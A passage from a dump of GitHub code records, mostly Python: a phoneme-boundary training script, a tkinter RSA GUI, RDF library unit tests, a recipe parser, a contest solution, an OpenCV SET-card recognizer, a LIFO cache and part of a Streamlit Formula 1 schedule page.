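# 'ABDEFHIJKL' with boundary flags 0100110001, matching its docstring.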
phones_and_boundaries = extract_boundaries(full_corpus)\n\n    # Divide into train and test.\n    train, test = corpora.train_test_split(phones_and_boundaries, \n                                           num_train, num_test, mode='end')\n\n    # Separate phones from boundary markers.\n    train_phones, _ = map(list, zip(*train))\n    test_phones, test_bounds = map(list, zip(*test))\n    joblib.dump(test_bounds, lang + '_bounds.pkl')\n    return  # early exit: only the boundary markers are dumped; the code below is unreachable\n\n    # Construct targets and encode phonemes.\n    train_in, train_out = prepare(train_phones, distributed)\n    test_in, test_out = prepare(test_phones, distributed)\n    \n    # Remove the trailing bound to match test_out.\n    del test_bounds[-1]\n    assert len(train_in) == len(train_out)\n    assert len(test_in) == len(test_out) == len(test_bounds)\n\n    return (train_in, train_out), (test_in, test_out), test_bounds\n\n\ndef run_experiment(net, lang, exp):\n    with open('experiment/{0}/train{1}.txt'.format(lang, exp), 'r') as f:\n        exp_train = f.read()\n    train = prepare(exp_train, net.distributed)\n    net.fit(*train)\n\n    with open('experiment/{0}/test{1}.txt'.format(lang, exp), 'r') as f:\n        trials = ['Q' + word.strip() + 'Q' for word in f]\n\n    for word in trials:\n        trial_in, trial_out = prepare(word, net.distributed)\n        result = net.test(trial_in, trial_out)\n        yield result\n\n\ndef run_net(net, lang, num_train, num_test, name=None):\n    name = name or lang + str(net.seed) + ('d' if net.distributed else 'l')\n    save_dir = 'nets/' + name\n    train, test, test_bounds = get_corpora(lang, num_train, num_test, net.distributed)\n    net.fit(*train)\n    print('saved', name)\n    net.save(save_dir)\n    test_result = net.test(*test)\n    test_errors = test_result['error_total']\n    test_outputs = test_result['out_activations']\n\n    exp_a_results = run_experiment(net, lang, 'A')\n    exp_a_errors = [result['error_total'] for result in exp_a_results]\n    net = Network.load(save_dir) # reset to before experiment A training\n    exp_b_results = run_experiment(net, lang, 'B')\n    exp_b_errors = [result['error_total'] for result in exp_b_results]\n\n    return {'lang': lang,\n            'name': name,\n            'distributed': net.distributed,\n            'test_errors': test_errors,\n            'test_outputs': test_outputs,\n            'exp_a_errors': exp_a_errors,\n            'exp_b_errors': exp_b_errors,\n            'test_bounds': test_bounds}\n\n\ndef main(num_nets=1, num_train=50000, num_test=1000):\n    results = []\n    for lang in ['english', 'danish']:\n        nets = [Network(i, distributed=d) for i in range(num_nets) for d in (False, )]\n        jobs = (delayed(run_net)(net, lang, num_train, num_test) for net in nets)\n        results.extend(Parallel(n_jobs=-1)(jobs))\n    \n    joblib.dump(results, 'results.pkl', compress=3)\n\n\n\n\n    \n\n\nif __name__ == '__main__':\n    #main()\n    get_corpora('english', 600000, 10000)","repo_name":"fredcallaway/danish","sub_path":"SRN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7517539885","text":"from tkinter import *\nfrom subguis import *\n\nroot = Tk()\n\nbackBgColor = '#701905'\n\nbgColor = '#701905'\nfgColor = 'white'\nfontSpec = 'Arial 10 bold'\nactiveBg = '#e0e0e0'\n\ntopLabel = 'RSA encryption program'\n\ncanvas = Canvas(root, width=270, height=250)\ncanvas.pack()\n\nframe = Frame(root)\nframe.place(relx=0.1, rely=0.1, relwidth=0.8, relheight=0.8)\n\nframeTop = Frame(frame)\nframeTop.place(rely=0.0, relwidth=1.0)\n\ntitle = Label(frameTop, text=topLabel, bg=backBgColor, pady=5, fg=fgColor, font='Times-new-roman 10 bold')\ntitle.pack(fill=X)\n\nframeBot = 
Frame(frame)\nframeBot.place(rely=0.35, relwidth=1.0)\n\nbutton1 = Button(frameBot, text='Generate public key', \n    bg=bgColor, fg=fgColor, font=fontSpec, activebackground=activeBg,\n    command=genkey)\nbutton1.pack(fill=X)\nbutton2 = Button(frameBot, text='Encrypt message', \n    bg=bgColor, fg=fgColor, font=fontSpec, activebackground=activeBg,\n    command=cryptmens)\nbutton2.pack(fill=X)\nbutton3 = Button(frameBot, text='Decrypt message', \n    bg=bgColor, fg=fgColor, font=fontSpec, activebackground=activeBg,\n    command=decptmens)\nbutton3.pack(fill=X)\n\nroot.resizable(width=False, height=False)\nroot.mainloop()","repo_name":"ghastcmd/RSAPython","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8171223394","text":"import rdflib\nimport unittest\nfrom bibcat import clean_uris, create_rdf_list, delete_bnode, delete_iri\nfrom bibcat import modified_bf_desc, slugify, wikify, replace_iri \n\n__author__ = \"Jeremy Nelson\"\n\nBF = rdflib.Namespace(\"http://id.loc.gov/ontologies/bibframe/\")\nSCHEMA = rdflib.Namespace(\"http://schema.org/\")\n\nclass Test_clean_uris(unittest.TestCase):\n\n    def setUp(self):\n        self.graph = rdflib.Graph()\n\n    def test_good_uri(self):\n        entity_1 = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n        self.graph.add((entity_1, rdflib.RDF.type, rdflib.RDFS.Resource))\n        clean_uris(self.graph)\n        extracted_entity = self.graph.value(predicate=rdflib.RDF.type,\n                                            object=rdflib.RDFS.Resource)\n        self.assertEqual(entity_1, extracted_entity)\n\n\nclass Test_create_rdf_list(unittest.TestCase):\n\n    def setUp(self):\n        self.graph = rdflib.Graph()\n        self.entity = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n        self.literal_list = [rdflib.Literal(\"One\", lang=\"en\"), \n                             rdflib.Literal(\"Dos\", lang=\"es\"), \n                             rdflib.Literal(\"San\", lang=\"jp\")]\n\n\n    def test_rdf_list_size_one(self):\n        self.graph.add((self.entity, \n                        rdflib.RDF.type, \n                        create_rdf_list(self.graph, [rdflib.RDFS.Resource,])))\n        self.assertEqual(len(self.graph), 3)\n\n    def test_rdf_list_size_three(self):\n        self.graph.add((self.entity, \n                        SCHEMA.numbers,\n                        create_rdf_list(self.graph, self.literal_list)))\n        count_sparql = \"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\n                SELECT (COUNT(?a) AS ?count) \n                WHERE {?a rdf:first+ ?c}\"\"\"\n        result = self.graph.query(count_sparql)\n        self.assertEqual(int(result.bindings[0].get('count')),\n                         3)\n\n    def test_rdf_list_size_three_order_2(self):\n        self.graph.add((self.entity,\n                        SCHEMA.numbers,\n                        create_rdf_list(self.graph, self.literal_list)))\n        second_node_sparql = \"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\n            PREFIX schema: <http://schema.org/>\n            SELECT ?item\n            WHERE {\n                 <https://bibcat.org/test-entity> schema:numbers/rdf:rest/rdf:rest/rdf:first ?item\n            }\"\"\"\n        result = self.graph.query(second_node_sparql)\n        self.assertEqual(result.bindings[0].get('item'), \n                         self.literal_list[2])\n\n\nclass Test_delete_bnode(unittest.TestCase):\n\n    def setUp(self):\n        self.graph = rdflib.Graph()\n        self.entity = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n        self.simple_title_bnode = rdflib.BNode()\n        self.graph.add((self.entity,\n                        rdflib.RDF.type,\n                        BF.Title))\n        self.graph.add((self.entity, BF.title, self.simple_title_bnode))\n        self.graph.add((self.simple_title_bnode, \n                        BF.mainTitle, \n                        rdflib.Literal(\"This is a test\")))\n        self.top_title_bnode = rdflib.BNode()\n        self.graph.add((self.entity, BF.title, self.top_title_bnode))\n        secondary_title_bnode = rdflib.BNode()\n        self.graph.add((self.top_title_bnode, rdflib.RDF.type, BF.Topic))\n        
self.graph.add((self.top_title_bnode, \n rdflib.RDFS.label, \n rdflib.Literal(\"This is a title and a name\")))\n self.graph.add((self.top_title_bnode, SCHEMA.name, secondary_title_bnode))\n self.graph.add((secondary_title_bnode, \n rdflib.RDF.value,\n rdflib.Literal(\"This is a name\")))\n\n def test_delete_1_level_deep_bnode(self):\n start_size = len(self.graph)\n delete_bnode(self.graph, self.simple_title_bnode)\n finish_size = len(self.graph)\n self.assertEqual(start_size-finish_size, 2)\n self.assertIsNone(self.graph.value(subject=self.simple_title_bnode,\n predicate=BF.mainTitle))\n\n def test_delete_2_level_deep_bnode(self):\n start_size = len(self.graph)\n delete_bnode(self.graph, self.top_title_bnode)\n finish_size = len(self.graph)\n self.assertEqual(start_size-finish_size, 5)\n self.assertIsNone(self.graph.value(subject=self.top_title_bnode,\n predicate=rdflib.RDFS.label))\n\nclass Test_delete_iri(unittest.TestCase):\n\n def setUp(self):\n self.graph = rdflib.Graph()\n self.entity_one = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n self.graph.add((self.entity_one, \n rdflib.RDF.type, \n rdflib.RDFS.Resource))\n self.graph.add((self.entity_one, \n rdflib.RDFS.label, \n rdflib.Literal(\"Test Entity One\", lang=\"en\")))\n self.entity_two = rdflib.URIRef(\"https://bibcat.org/test-entity-two\")\n self.graph.add((self.entity_two, \n rdflib.RDF.type, \n rdflib.RDFS.Resource))\n self.graph.add((self.entity_two, \n rdflib.RDFS.label, \n rdflib.Literal(\"Test Entity Two\", lang=\"en\")))\n title_bnode = rdflib.BNode()\n self.graph.add((self.entity_two, BF.title, title_bnode))\n self.graph.add((title_bnode, rdflib.RDF.type, BF.Title))\n self.graph.add((title_bnode, BF.subTitle, rdflib.Literal(\"Subtitle \")))\n\n\n def test_delete_iri(self):\n start_size = len(self.graph)\n delete_iri(self.graph, self.entity_one)\n finish_size = len(self.graph)\n self.assertEqual(start_size - finish_size, 2)\n self.assertIsNone(self.graph.value(subject=self.entity_one,\n predicate=rdflib.RDF.type))\n\n def test_delete_complex_iri(self):\n start_size = len(self.graph)\n delete_iri(self.graph, self.entity_two)\n finish_size = len(self.graph)\n self.assertEqual(start_size-finish_size, 5)\n self.assertIsNone(self.graph.value(subject=self.entity_two,\n predicate=rdflib.RDF.type))\n \nclass Test_modified_bf_desc(unittest.TestCase):\n\n def setUp(self):\n self.graph = rdflib.Graph()\n self.graph.namespace_manager.bind(\"bf\", BF)\n self.entity_iri = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n self.graph.add((self.entity_iri, \n rdflib.RDF.type, \n rdflib.RDFS.Resource))\n self.graph.add((self.entity_iri, \n rdflib.RDFS.label, \n rdflib.Literal(\"Test Entity One\", lang=\"en\")))\n self.message = \"Changed rdfs:label\"\n \n\n def test_default(self):\n modified_bf_desc(graph=self.graph,\n entity_iri=self.entity_iri,\n msg=self.message)\n admin_meta_bnode = self.graph.value(\n subject=self.entity_iri,\n predicate=BF.adminMetadata)\n self.assertIsNotNone(admin_meta_bnode)\n msg_value = self.graph.value(\n subject=admin_meta_bnode,\n predicate=rdflib.RDF.value)\n self.assertEqual(str(msg_value), self.message)\n \n def test_missing_all_keywords(self):\n self.assertRaises(AttributeError,\n modified_bf_desc)\n\n def test_missing_graph_keyword(self):\n self.assertRaises(AttributeError,\n modified_bf_desc,\n entity_iri=self.entity_iri,\n msg=self.message) \n\n def test_missing_entity_iri_keyword(self):\n self.assertRaises(AssertionError,\n modified_bf_desc,\n graph=self.graph,\n msg=self.message)\n\n def 
test_missing_msg_keyword(self):\n        self.assertRaises(AttributeError,\n                          modified_bf_desc,\n                          graph=self.graph,\n                          entity_iri=self.entity_iri)\n\n    def test_agent_iri(self):\n        agent_iri = rdflib.URIRef(\"https://bibcat.org/Agent-1\")\n        self.graph.add((agent_iri, rdflib.RDF.type, BF.Agent))\n        modified_bf_desc(graph=self.graph,\n                         entity_iri=self.entity_iri,\n                         msg=self.message,\n                         agent_iri=agent_iri)\n        admin_bnode = self.graph.value(subject=self.entity_iri,\n                                       predicate=BF.adminMetadata)\n        self.assertIsNotNone(admin_bnode)\n        desc_modifier = self.graph.value(subject=admin_bnode,\n                                         predicate=BF.descriptionModifier)\n        self.assertEqual(agent_iri, desc_modifier)\n\n    def test_person_iri(self):\n        person_iri = rdflib.URIRef(\"https://bibcat.org/Person-1\")\n        self.graph.add((person_iri, rdflib.RDF.type, BF.Person))\n        modified_bf_desc(graph=self.graph,\n                         entity_iri=self.entity_iri,\n                         msg=self.message,\n                         agent_iri=person_iri)\n        admin_bnode = self.graph.value(subject=self.entity_iri,\n                                       predicate=BF.adminMetadata)\n        self.assertIsNotNone(admin_bnode)\n        desc_modifier = self.graph.value(subject=admin_bnode,\n                                         predicate=BF.descriptionModifier)\n        self.assertEqual(person_iri, desc_modifier)\n\n    \n\n    def test_org_iri(self):\n        org_iri = rdflib.URIRef(\"https://bibcat.org/Organization-1\")\n        self.graph.add((org_iri, rdflib.RDF.type, BF.Organization))\n        modified_bf_desc(graph=self.graph,\n                         entity_iri=self.entity_iri,\n                         msg=self.message,\n                         agent_iri=org_iri)\n        admin_bnode = self.graph.value(subject=self.entity_iri,\n                                       predicate=BF.adminMetadata)\n        self.assertIsNotNone(admin_bnode)\n        desc_modifier = self.graph.value(subject=admin_bnode,\n                                         predicate=BF.descriptionModifier)\n        self.assertEqual(org_iri, desc_modifier)\n\n    \n    \n\n    def tearDown(self):\n        pass    \n\nclass Test_replace_iri(unittest.TestCase):\n    \n    def setUp(self):\n        self.graph = rdflib.Graph()\n        self.entity_one = rdflib.URIRef(\"https://bibcat.org/test-entity\")\n        self.graph.add((self.entity_one, \n                        rdflib.RDF.type, \n                        rdflib.RDFS.Resource))\n        self.graph.add((self.entity_one, \n                        rdflib.RDFS.label, \n                        rdflib.Literal(\"Test Entity One\", lang=\"en\")))\n\n    def test_simple_replace(self):\n        new_iri = rdflib.URIRef(\"https://bibcat.org/replace-entity\")\n        replace_iri(self.graph, self.entity_one, new_iri)\n        self.assertEqual(self.graph.value(subject=new_iri, \n                                          predicate=rdflib.RDF.type),\n                         rdflib.RDFS.Resource)\n        self.assertEqual(self.graph.value(subject=new_iri,\n                                          predicate=rdflib.RDFS.label),\n                         rdflib.Literal(\"Test Entity One\", lang=\"en\"))\n        self.assertIsNone(self.graph.value(subject=self.entity_one,\n                                           predicate=rdflib.RDF.type))\n\n    def test_bnode_old_iri_exception(self):\n        pass\n\n\nclass Test_slugify(unittest.TestCase):\n\n    def setUp(self):\n        pass\n\n    def test_simple_name(self):\n        self.assertEqual(\"mexico-city\",\n                         slugify(\"Mexico City\"))\n\n\nclass Test_wikify(unittest.TestCase):\n\n    def setUp(self):\n        pass\n\n    def test_simple_name(self):\n        self.assertEqual(\"Tokyo_Japan\",\n                         wikify(\"Tokyo, Japan\"))\n\n    def tearDown(self):\n        pass\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"KnowledgeLinks/bibcat","sub_path":"bibcat/tests/test_bibcat_funcs.py","file_name":"test_bibcat_funcs.py","file_ext":"py","file_size_in_byte":12071,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"6353084676","text":"def process_recipe(lines, index):\n    name = lines[index]\n    count = int(lines[index + 1])\n    ingredients = []\n    for i in range(index + 2, index + count + 2):\n        _name, _quantity, _measure = lines[i].split(' 
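bibcat's `create_rdf_list` exercised by the tests above is not shown in this file; rdflib's own `Collection` helper builds the same rdf:first/rdf:rest chain, so a rough equivalent of what those tests expect (an assumption about the helper's contract, not bibcat's code) is:

import rdflib
from rdflib.collection import Collection

g = rdflib.Graph()
head = rdflib.BNode()  # node handed back to the caller, like create_rdf_list
Collection(g, head, [rdflib.Literal("One", lang="en"),
                     rdflib.Literal("Dos", lang="es"),
                     rdflib.Literal("San", lang="jp")])
assert len(g) == 6  # one rdf:first and one rdf:rest triple per element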
| ')\n        ingredients.append({\n            'ingredient_name': _name,\n            'quantity': int(_quantity),\n            'measure': _measure,\n        })\n    return {name: ingredients}, index + count + 2\n\ndef read_receipts(file_path):\n    with open(file_path, 'r') as f:\n        lines = f.readlines()\n        for i, line in enumerate(lines):\n            lines[i] = line.rstrip('\\n')\n    receipts = {}\n    index = 0\n    while index < len(lines):  # '<' (not '<='): a trailing blank line would otherwise index past the end\n        receipt, index = process_recipe(lines, index)\n        index += 1\n        receipts.update(receipt)\n    return receipts\n\nfile_path = 'C:\\\\Users\\\\lenar\\\\AppData\\\\Roaming\\\\JetBrains\\\\PyCharmCE2022.2\\\\scratches\\\\scratch_1.txt'\n\nreceipts = read_receipts(file_path)\nprint(receipts)\n\n# ======================================\n# #2\n# ======================================\ndef get_shop_list_by_dishes(dishes, person_count):\n    ingredients = {}\n    for dish in dishes:\n        receipt = receipts[dish]\n        for item in receipt:\n            if item['ingredient_name'] in ingredients:\n                ingredients[item['ingredient_name']]['quantity'] += item['quantity'] * person_count\n            else:\n                ingredients[item['ingredient_name']] = {\n                    \"measure\": item['measure'],\n                    \"quantity\": item['quantity'] * person_count,\n                }\n    return ingredients\n\n","repo_name":"Lenar1101/task-1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41915290861","text":"from collections import deque\n\nn, k = map(int, input().split())\nbinary = bin(n)\npowers = deque([2**i for i, bit in enumerate(reversed(binary)) if bit == \"1\"])\n\nif len(powers) > k or k > n:\n    print(\"NO\")\n    exit(0)\n\nprint(\"YES\")\nones = 0\nwhile len(powers) + ones != k:\n    x = powers.pop()\n\n    if x == 1:\n        ones += 1\n    elif x // 2 == 1:\n        ones += 2\n    else:\n        powers.append(x // 2)\n        powers.append(x // 2)\n\npowers.extend([1] * ones)\nprint(*powers)\n\n\n\n","repo_name":"TobiPristupin/CompetitiveProgramming","sub_path":"CodeForces/PowersOfTwo1095C.py","file_name":"PowersOfTwo1095C.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39289519928","text":"import math\nfrom typing import Any, List, Optional\n\nimport cv2\nimport numpy as np\nfrom scipy.spatial import distance\n\nfrom setsolver.card import Card\nfrom setsolver.properties import Color, Count, Fill, Shape\n\n\nclass CardRecognition:\n    def __init__(self, img=None):\n        self._img = img\n        self._processed_image = None\n        self._processed_threshold = None\n        self.shape_contours = []\n        self.processed_for_shade = None\n        self.card_info = dict()\n        self.abstract_card = None\n\n    @property\n    def img(self):\n        return self._img\n\n    @img.setter\n    def img(self, value: np.ndarray):\n        # identity check: elementwise '!=' on an ndarray is ambiguous in a bool context\n        if value is not self._img:\n            self._img = value\n\n    @staticmethod\n    def adjust_gamma(image, gamma=1.0) -> np.ndarray:\n        # build a lookup table mapping the pixel values [0, 255] to\n        # their adjusted gamma values\n        inverse_gamma = 1.0 / gamma\n        table = np.array(\n            [((i / 255.0) ** inverse_gamma) * 255 for i in np.arange(0, 256)]\n        ).astype(\"uint8\")\n        # apply gamma correction using the lookup table\n        return cv2.LUT(image, table)\n\n    def get_color(self) -> str:\n        img = self._img\n        colors = dict()\n        boundaries = {\n            \"red\": ([58, 37, 120], [100, 100, 230]),\n            \"green\": ([0, 60, 0], [90, 200, 90]),\n            \"purple\": ([35, 0, 35], [200, 90, 150]),\n        }\n        map_to_card = {\n            \"red\": Color.RED,\n            \"green\": Color.GREEN,\n            \"purple\": 
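The CodeForces 1095C solution above keeps splitting the largest power of two until exactly k summands remain; a small offline check of that invariant (a hypothetical harness, not part of the submission):

def check_split(n, k, parts):
    # a valid answer has exactly k terms, sums to n, and uses only powers of two
    assert len(parts) == k
    assert sum(parts) == n
    assert all(p > 0 and p & (p - 1) == 0 for p in parts)

check_split(9, 4, [4, 2, 2, 1])  # e.g. 9 = 4 + 2 + 2 + 1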
Color.PURPLE,\n }\n for key, value in boundaries.items():\n # create NumPy arrays from the boundaries\n lower = np.array(value[0], dtype=\"uint8\")\n upper = np.array(value[1], dtype=\"uint8\")\n mask = cv2.inRange(img, lower, upper)\n output = cv2.bitwise_and(img, self._img, mask=mask)\n colors[key] = np.count_nonzero(output)\n most_intense_color = max(colors.items(), key=lambda x: x[1])\n color = most_intense_color[0]\n # print(colors)\n self.card_info[\"color\"] = map_to_card.get(color)\n return color\n\n def preprocess_card(self) -> np.ndarray:\n image = self._img\n img = image\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n result_planes = []\n result_norm_planes = []\n clache = cv2.createCLAHE(clipLimit=2, tileGridSize=(8, 8))\n img = clache.apply(img)\n self.processed_for_shade = img\n rgb_planes = cv2.split(img)\n # this removes the shading\n for plane in rgb_planes:\n dilated_img = cv2.dilate(plane, np.ones((7, 7), np.uint8))\n bg_img = cv2.medianBlur(dilated_img, 21)\n diff_img = 255 - cv2.absdiff(plane, bg_img)\n norm_img = cv2.normalize(\n diff_img,\n None,\n alpha=0,\n beta=255,\n norm_type=cv2.NORM_MINMAX,\n dtype=cv2.CV_8UC1,\n )\n result_planes.append(diff_img)\n result_norm_planes.append(norm_img)\n result_norm = cv2.merge(result_norm_planes)\n img = cv2.GaussianBlur(result_norm, (5, 5), 1)\n kernel = np.ones((5, 5))\n img = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n # cv2.imshow(\"given to thresh\", img)\n return img\n\n def get_fill(self) -> str:\n if len(self.shape_contours) > 0:\n # preprocess image\n img = self.processed_for_shade\n sharpen_kernel = np.array(\n [[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]]\n )\n img = cv2.filter2D(img, -1, sharpen_kernel)\n # caclulate diff for every found shape take the maximum one\n current_avg: int = 255\n for contour in self.shape_contours:\n moments = cv2.moments(contour)\n center_of_shape_x = int(moments[\"m10\"] / moments[\"m00\"])\n center_of_shape_y = int(moments[\"m01\"] / moments[\"m00\"])\n left_corner_x = center_of_shape_x - 20\n left_corner_y = center_of_shape_y - 20\n right_corner_x = center_of_shape_x + 20\n right_corner_y = center_of_shape_y + 20\n within_cnt = img[\n left_corner_y:right_corner_y, left_corner_x:right_corner_x\n ]\n avg_color_per_row_cnt = np.average(within_cnt, axis=0)\n avg_colors_cnt = np.average(avg_color_per_row_cnt, axis=0)\n int_averages_cnt = np.array(avg_colors_cnt, dtype=np.uint8)\n if int(int_averages_cnt) < current_avg:\n current_avg = int(int_averages_cnt)\n\n edge_x = 30\n edge_y = 30\n top_edge_x = edge_x - 20\n top_edge_y = edge_y - 20\n bottom_edge_x = edge_x + 20\n bottom_edge_y = edge_y + 20\n\n edge = img[top_edge_y:bottom_edge_y, top_edge_x:bottom_edge_x]\n # cv2.imshow(\"proc\", img)\n # cv2.waitKey()\n avg_color_per_row = np.average(edge, axis=0)\n # calculate the averages of our rows\n avg_colors_edge = np.average(avg_color_per_row, axis=0)\n int_averages_edge = np.array(avg_colors_edge, dtype=np.uint8)\n\n diff = abs(int(int_averages_edge) - current_avg)\n print(f\"diff: {diff}\")\n if diff <= 15:\n self.card_info[\"fill\"] = Fill.EMPTY\n return \"empty\"\n elif diff > 80:\n self.card_info[\"fill\"] = Fill.FULL\n return \"full\"\n else:\n self.card_info[\"fill\"] = Fill.STRIPED\n return \"striped\"\n raise RuntimeError(\"No shapes detected\")\n\n def get_number_of_shapes(self) -> int:\n \"\"\"\n Returns the number of cards on an image and sets the main contour\n \"\"\"\n card_map = {1: Count.ONE, 2: Count.TWO, 3: Count.THREE}\n img = self.preprocess_card()\n min_area = 
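`adjust_gamma` above is a plain lookup-table gamma correction; a tiny usage check (hypothetical values, requires OpenCV and the class from this record) would be:

import numpy as np

gray = np.full((4, 4), 64, dtype=np.uint8)
bright = CardRecognition.adjust_gamma(gray, gamma=2.0)  # gamma > 1 brightens mid-tones
assert bright.mean() > gray.mean()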
img.size * 0.06\n max_area = img.size * 0.9\n threshold = cv2.threshold(\n img, 0, 255, cv2.THRESH_OTSU + cv2.THRESH_BINARY\n )[1]\n cnt, hier = cv2.findContours(\n threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE\n )\n new_cnt: List[Any] = []\n central_coordinates: List[List[int]] = []\n for i, c in enumerate(cnt):\n if max_area > cv2.contourArea(c) > min_area:\n moments = cv2.moments(c)\n center_of_shape_x = int(moments[\"m10\"] / moments[\"m00\"])\n center_of_shape_y = int(moments[\"m01\"] / moments[\"m00\"])\n # if there are recorded found shapes\n all_far = True\n for coord in central_coordinates:\n dist = distance.euclidean(\n (coord[0], coord[1]),\n (center_of_shape_x, center_of_shape_y),\n )\n if dist < 50:\n all_far = False\n break\n if all_far:\n new_cnt.append(c)\n central_coordinates.append(\n [center_of_shape_x, center_of_shape_y]\n )\n # cv2.drawContours(threshold, new_cnt, -1, (255, 255, 255), 3)\n self.shape_contours = new_cnt\n self.card_info[\"count\"] = card_map.get(len(new_cnt))\n return len(new_cnt)\n\n def get_shape(self) -> str:\n if len(self.shape_contours) > 0:\n contour = self.shape_contours[0]\n epsilon = 0.01 * cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, epsilon=epsilon, closed=True)\n moments = cv2.moments(contour)\n # Calculate Hu Moments\n hu_moments = cv2.HuMoments(moments)\n new_moments = []\n for i in range(7):\n new_moments.append(\n -1\n * math.copysign(1.0, hu_moments[i])\n * math.log10(abs(hu_moments[i]))\n )\n hu1 = new_moments[0]\n print(new_moments)\n if len(approx) == 4:\n self.card_info[\"shape\"] = Shape.DIAMOND\n return \"diamond\"\n if hu1 < 0.62:\n self.card_info[\"shape\"] = Shape.WAVE\n return \"wave\"\n elif 0.62 <= hu1 < 0.669:\n self.card_info[\"shape\"] = Shape.DIAMOND\n return \"diamond\"\n elif hu1 >= 0.669:\n self.card_info[\"shape\"] = Shape.OVAL\n return \"oval\"\n raise RuntimeError(\"No shapes detected\")\n\n def create_card(self) -> Optional[Card]:\n fill = self.card_info.get(\"fill\")\n count = self.card_info.get(\"count\")\n color = self.card_info.get(\"color\")\n shape = self.card_info.get(\"shape\")\n if all([fill, count, color, shape]):\n card: Optional[Card] = Card(fill, count, color, shape)\n else:\n card = None\n self.abstract_card = card\n return card\n\n def process_all_properties(self):\n self.get_number_of_shapes()\n self.get_color()\n self.get_shape()\n self.get_fill()\n self.create_card()\n","repo_name":"vidagy/setsolver","sub_path":"setsolver/image_detection/card_recognition.py","file_name":"card_recognition.py","file_ext":"py","file_size_in_byte":9271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32733788245","text":"#!/usr/bin/env python3\n\"\"\" LIFO caching module \"\"\"\nfrom base_caching import BaseCaching\nfrom collections import OrderedDict\n\n\nclass LIFOCache(BaseCaching):\n \"\"\"Represents an object that allows storing and\n retrieving items from a dictionary with a LIFO\n removal mechanism when the limit is reached.\n \"\"\"\n def __init__(self):\n \"\"\" initializing caching \"\"\"\n super().__init__()\n self.cache_data = OrderedDict()\n\n def put(self, key, item):\n \"\"\" Add an item \"\"\"\n if key is None or item is None:\n return\n if key not in self.cache_data:\n if len(self.cache_data) + 1 > BaseCaching.MAX_ITEMS:\n last_key, last_item = self.cache_data.popitem(last=True)\n print(f\"DISCARD: {last_key}\")\n self.cache_data[key] = item\n self.cache_data.move_to_end(key, last=True)\n\n def get(self, key):\n 
\"\"\" access an item \"\"\"\n return self.cache_data.get(key, None)\n","repo_name":"Sideeqkolade/alx-backend","sub_path":"0x01-caching/2-lifo_cache.py","file_name":"2-lifo_cache.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30390373119","text":"from datetime import datetime, timedelta\nimport streamlit as st\n\n\nfrom youtubesearchpython import *\n\n\nallVideoLinks = []\n\n\nhide_menu_style = \"\"\"\n \n \"\"\"\nst.markdown(hide_menu_style, unsafe_allow_html=True)\n\n\n\n\nhtp=\"https://raw.githubusercontent.com/cctij69/F1_highlights/main/F1%20logo.png\" \nst.image(htp, width=350)\n\n\n\n\ngp_schedule = {\n 1: {'Grand Prix': 'Bahrain', 'Circuit': 'Sakhir', 'Date': '05 March', 'Sprint': 'No'},\n 2: {'Grand Prix': 'Saudi Arabian', 'Circuit': 'Jeddah', 'Date': '19 March', 'Sprint': 'No'},\n 3: {'Grand Prix': 'Australian', 'Circuit': 'Melbourne', 'Date': '02 April', 'Sprint': 'No'},\n 4: {'Grand Prix': 'Azerbaijan', 'Circuit': 'Baku', 'Date': '30 April', 'Sprint': 'Yes'},\n 5: {'Grand Prix': 'Miami', 'Circuit': 'Florida', 'Date': '07 May', 'Sprint': 'No'},\n 6: {'Grand Prix': 'Emilia Romagna', 'Circuit': 'Imola', 'Date': '21 May', 'Sprint': 'No'},\n 7: {'Grand Prix': 'Monaco', 'Circuit': 'Monte Carlo', 'Date': '28 May', 'Sprint': 'No'},\n 8: {'Grand Prix': 'Spanish', 'Circuit': 'Catalunya', 'Date': '04 June', 'Sprint': 'No'},\n 9: {'Grand Prix': 'Canadian', 'Circuit': 'Montreal', 'Date': '18 June', 'Sprint': 'No'},\n 10: {'Grand Prix': 'Austrian', 'Circuit': 'Spielberg', 'Date': '02 July', 'Sprint': 'Yes'},\n 11: {'Grand Prix': 'British', 'Circuit': 'Silverstone', 'Date': '09 July', 'Sprint': 'No'},\n 12: {'Grand Prix': 'Hungarian', 'Circuit': 'Hungaroring', 'Date': '23 July', 'Sprint': 'No'},\n 13: {'Grand Prix': 'Belgian', 'Circuit': 'Spa-Francorchamps', 'Date': '30 July', 'Sprint': 'Yes'},\n 14: {'Grand Prix': 'Dutch', 'Circuit': 'Zandvoort', 'Date': '27 August', 'Sprint': 'No'},\n 15: {'Grand Prix': 'Italian', 'Circuit': 'Monza', 'Date': '03 September', 'Sprint': 'No'},\n 16: {'Grand Prix': 'Singapore', 'Circuit': 'Marina Bay', 'Date': '17 September', 'Sprint': 'No'},\n 17: {'Grand Prix': 'Japanese', 'Circuit': 'Suzuka', 'Date': '24 September', 'Sprint': 'No'},\n 18: {'Grand Prix': 'Qatar', 'Circuit': 'Losail', 'Date': '08 October', 'Sprint': 